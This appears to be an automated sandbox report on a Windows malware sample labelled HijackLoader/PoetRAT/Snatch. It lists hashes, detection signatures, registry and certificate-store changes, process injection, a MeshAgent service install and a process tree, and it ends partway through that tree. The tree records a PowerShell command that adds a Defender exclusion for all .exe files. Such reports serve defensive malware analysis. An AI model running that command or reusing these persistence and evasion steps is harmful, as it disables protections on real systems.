Analysis
-
max time kernel
92s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
24-09-2024 17:40
Static task
static1
Behavioral task
behavioral1
Sample
20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe
Resource
win7-20240903-en
General
-
Target
20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe
-
Size
19.0MB
-
MD5
e664e32eae75f70aca3b95397beb8706
-
SHA1
ca649ca8a6f15876d56f7a3491f7435f5b0df8ef
-
SHA256
d8ae46b6adb3b8dcaddaab2adaf4337048e29c1ffd1caccbe22612dad8113402
-
SHA512
d522171534431ae1cc9c3536845f3404d89cadbd3e8481ac64c5f3b98b16d0625d6619b00e23e579b575dd99498bd43e6d1b6c07da81839337e9897b901f672a
-
SSDEEP
393216:ZGbYHohSnaqtvylAjWZ0Xq9YLuxMfCVb2:gbYHPhtvylAjWZ0Xq9YLuxMfCVK
Malware Config
Signatures
-
Detects MeshAgent payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\naver\naver.exe family_meshagent -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 27 1884 powershell.exe 28 1884 powershell.exe 31 1884 powershell.exe 32 1884 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepid process 2244 powershell.exe 2304 powershell.exe 1644 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
naver.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\naver Service\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\naver\\naver.exe\" --meshServiceName=\"naver Service\"" naver.exe -
Executes dropped EXE 2 IoCs
Processes:
naver.exenaver.exepid process 3316 naver.exe 2192 naver.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 64 IoCs
Processes:
naver.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\dll\msvcrt.pdb naver.exe File opened for modification C:\Windows\System32\ucrtbase.pdb naver.exe File opened for modification C:\Windows\System32\ntasn1.pdb naver.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys naver.exe File opened for modification C:\Windows\System32\ole32.pdb naver.exe File opened for modification C:\Windows\System32\dll\Kernel.Appcore.pdb naver.exe File opened for modification C:\Windows\System32\exe\MeshService64.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\comctl32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\msvcrt.pdb naver.exe File opened for modification C:\Windows\System32\ws2_32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\gdi32full.pdb naver.exe File opened for modification C:\Windows\System32\dll\crypt32.pdb naver.exe File opened for modification C:\Windows\System32\iphlpapi.pdb naver.exe File opened for modification C:\Windows\System32\dll\shell32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\shell32.pdb naver.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\System32\dll\shcore.pdb naver.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\39D8960339E98ED327D3ACF7EF9C1C329EC27809 naver.exe File opened for modification C:\Windows\System32\gdi32.pdb naver.exe File opened for modification C:\Windows\System32\gdi32full.pdb naver.exe File opened for modification C:\Windows\System32\dll\dbghelp.pdb naver.exe File opened for modification C:\Windows\System32\dll\combase.pdb naver.exe File opened for modification C:\Windows\System32\DLL\dbgcore.pdb naver.exe File opened for modification C:\Windows\System32\DLL\bcrypt.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb naver.exe File opened for modification C:\Windows\System32\shcore.pdb naver.exe File opened for modification C:\Windows\System32\msvcrt.pdb naver.exe File opened for modification C:\Windows\System32\dll\win32u.pdb naver.exe File opened for modification C:\Windows\System32\dll\gdi32full.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\msvcp_win.pdb naver.exe File opened for modification C:\Windows\System32\sechost.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\ncrypt.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\ntdll.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\rpcrt4.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\dbghelp.pdb naver.exe File opened for modification C:\Windows\System32\bcryptprimitives.pdb naver.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\MeshService64.pdb naver.exe File opened for modification C:\Windows\System32\comctl32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\advapi32.pdb naver.exe File opened for modification C:\Windows\System32\dll\sechost.pdb naver.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\328FC4DCB11193B185AE89ACB02AA01BC7434194 naver.exe File opened for modification C:\Windows\System32\symbols\dll\combase.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\bcryptprimitives.pdb naver.exe File opened for modification C:\Windows\System32\crypt32.pdb naver.exe File opened for modification C:\Windows\System32\advapi32.pdb naver.exe File opened for modification C:\Windows\System32\dbghelp.pdb naver.exe File opened for modification C:\Windows\System32\DLL\iphlpapi.pdb naver.exe File opened for modification C:\Windows\System32\symbols\DLL\iphlpapi.pdb naver.exe File opened for modification C:\Windows\System32\combase.pdb naver.exe File opened for modification C:\Windows\System32\dll\ncrypt.pdb naver.exe File opened for modification C:\Windows\System32\bcrypt.pdb naver.exe File opened for modification C:\Windows\System32\dll\kernelbase.pdb naver.exe File opened for modification C:\Windows\System32\dll\ws2_32.pdb naver.exe File opened for modification C:\Windows\System32\dll\gdi32.pdb naver.exe File opened for modification C:\Windows\System32\rpcrt4.pdb naver.exe File opened for modification C:\Windows\System32\shell32.pdb naver.exe File opened for modification C:\Windows\System32\dll\gdiplus.pdb naver.exe File opened for modification C:\Windows\System32\Kernel.Appcore.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\kernelbase.pdb naver.exe File opened for modification C:\Windows\System32\user32.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\sechost.pdb naver.exe File opened for modification C:\Windows\System32\symbols\dll\gdiplus.pdb naver.exe File opened for modification C:\Windows\System32\dll\ntasn1.pdb naver.exe -
Modifies data under HKEY_USERS 52 IoCs
Processes:
powershell.exenaver.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" naver.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" naver.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" naver.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133716732718239736" naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry naver.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe -
Processes:
20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exemsedge.exepid process 2304 powershell.exe 2304 powershell.exe 1884 powershell.exe 1884 powershell.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe 1260 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exemsedge.exechrome.exepowershell.exewmic.exewmic.exewmic.exedescription pid process Token: SeDebugPrivilege 2304 powershell.exe Token: SeDebugPrivilege 1884 powershell.exe Token: SeDebugPrivilege 1260 msedge.exe Token: SeDebugPrivilege 2928 chrome.exe Token: SeDebugPrivilege 1644 powershell.exe Token: SeAssignPrimaryTokenPrivilege 4028 wmic.exe Token: SeIncreaseQuotaPrivilege 4028 wmic.exe Token: SeSecurityPrivilege 4028 wmic.exe Token: SeTakeOwnershipPrivilege 4028 wmic.exe Token: SeLoadDriverPrivilege 4028 wmic.exe Token: SeSystemtimePrivilege 4028 wmic.exe Token: SeBackupPrivilege 4028 wmic.exe Token: SeRestorePrivilege 4028 wmic.exe Token: SeShutdownPrivilege 4028 wmic.exe Token: SeSystemEnvironmentPrivilege 4028 wmic.exe Token: SeUndockPrivilege 4028 wmic.exe Token: SeManageVolumePrivilege 4028 wmic.exe Token: SeAssignPrimaryTokenPrivilege 4028 wmic.exe Token: SeIncreaseQuotaPrivilege 4028 wmic.exe Token: SeSecurityPrivilege 4028 wmic.exe Token: SeTakeOwnershipPrivilege 4028 wmic.exe Token: SeLoadDriverPrivilege 4028 wmic.exe Token: SeSystemtimePrivilege 4028 wmic.exe Token: SeBackupPrivilege 4028 wmic.exe Token: SeRestorePrivilege 4028 wmic.exe Token: SeShutdownPrivilege 4028 wmic.exe Token: SeSystemEnvironmentPrivilege 4028 wmic.exe Token: SeUndockPrivilege 4028 wmic.exe Token: SeManageVolumePrivilege 4028 wmic.exe Token: SeAssignPrimaryTokenPrivilege 4336 wmic.exe Token: SeIncreaseQuotaPrivilege 4336 wmic.exe Token: SeSecurityPrivilege 4336 wmic.exe Token: SeTakeOwnershipPrivilege 4336 wmic.exe Token: SeLoadDriverPrivilege 4336 wmic.exe Token: SeSystemtimePrivilege 4336 wmic.exe Token: SeBackupPrivilege 4336 wmic.exe Token: SeRestorePrivilege 4336 wmic.exe Token: SeShutdownPrivilege 4336 wmic.exe Token: SeSystemEnvironmentPrivilege 4336 wmic.exe Token: SeUndockPrivilege 4336 wmic.exe Token: SeManageVolumePrivilege 4336 wmic.exe Token: SeAssignPrimaryTokenPrivilege 4336 wmic.exe Token: SeIncreaseQuotaPrivilege 4336 wmic.exe Token: SeSecurityPrivilege 4336 wmic.exe Token: SeTakeOwnershipPrivilege 4336 wmic.exe Token: SeLoadDriverPrivilege 4336 wmic.exe Token: SeSystemtimePrivilege 4336 wmic.exe Token: SeBackupPrivilege 4336 wmic.exe Token: SeRestorePrivilege 4336 wmic.exe Token: SeShutdownPrivilege 4336 wmic.exe Token: SeSystemEnvironmentPrivilege 4336 wmic.exe Token: SeUndockPrivilege 4336 wmic.exe Token: SeManageVolumePrivilege 4336 wmic.exe Token: SeAssignPrimaryTokenPrivilege 2132 wmic.exe Token: SeIncreaseQuotaPrivilege 2132 wmic.exe Token: SeSecurityPrivilege 2132 wmic.exe Token: SeTakeOwnershipPrivilege 2132 wmic.exe Token: SeLoadDriverPrivilege 2132 wmic.exe Token: SeSystemtimePrivilege 2132 wmic.exe Token: SeBackupPrivilege 2132 wmic.exe Token: SeRestorePrivilege 2132 wmic.exe Token: SeShutdownPrivilege 2132 wmic.exe Token: SeSystemEnvironmentPrivilege 2132 wmic.exe Token: SeUndockPrivilege 2132 wmic.exe -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exepowershell.exemsedge.exechrome.exenaver.exedescription pid process target process PID 780 wrote to memory of 1884 780 20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe powershell.exe PID 780 wrote to memory of 1884 780 20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe powershell.exe PID 780 wrote to memory of 2304 780 20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe powershell.exe PID 780 wrote to memory of 2304 780 20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe powershell.exe PID 1884 wrote to memory of 1260 1884 powershell.exe msedge.exe PID 1884 wrote to memory of 1260 1884 powershell.exe msedge.exe PID 1884 wrote to memory of 1260 1884 powershell.exe msedge.exe PID 1884 wrote to memory of 1260 1884 powershell.exe msedge.exe PID 1260 wrote to memory of 2928 1260 msedge.exe chrome.exe PID 1260 wrote to memory of 2928 1260 msedge.exe chrome.exe PID 1260 wrote to memory of 2928 1260 msedge.exe chrome.exe PID 1260 wrote to memory of 2928 1260 msedge.exe chrome.exe PID 2928 wrote to memory of 1644 2928 chrome.exe powershell.exe PID 2928 wrote to memory of 1644 2928 chrome.exe powershell.exe PID 2928 wrote to memory of 3316 2928 chrome.exe naver.exe PID 2928 wrote to memory of 3316 2928 chrome.exe naver.exe PID 2192 wrote to memory of 4028 2192 naver.exe wmic.exe PID 2192 wrote to memory of 4028 2192 naver.exe wmic.exe PID 2192 wrote to memory of 4336 2192 naver.exe wmic.exe PID 2192 wrote to memory of 4336 2192 naver.exe wmic.exe PID 2192 wrote to memory of 2132 2192 naver.exe wmic.exe PID 2192 wrote to memory of 2132 2192 naver.exe wmic.exe PID 2192 wrote to memory of 4808 2192 naver.exe wmic.exe PID 2192 wrote to memory of 4808 2192 naver.exe wmic.exe PID 2192 wrote to memory of 3240 2192 naver.exe wmic.exe PID 2192 wrote to memory of 3240 2192 naver.exe wmic.exe PID 2192 wrote to memory of 1632 2192 naver.exe wmic.exe PID 2192 wrote to memory of 1632 2192 naver.exe wmic.exe PID 2192 wrote to memory of 2244 2192 naver.exe powershell.exe PID 2192 wrote to memory of 2244 2192 naver.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe"C:\Users\Admin\AppData\Local\Temp\20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe"1⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "Add-MpPreference -ExclusionExtension '.exe' -Force"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1644 -
C:\Users\Admin\AppData\Local\naver\naver.exeC:\Users\Admin\AppData\Local\naver\naver.exe -install5⤵
- Sets service image path in registry
- Executes dropped EXE
PID:3316 -
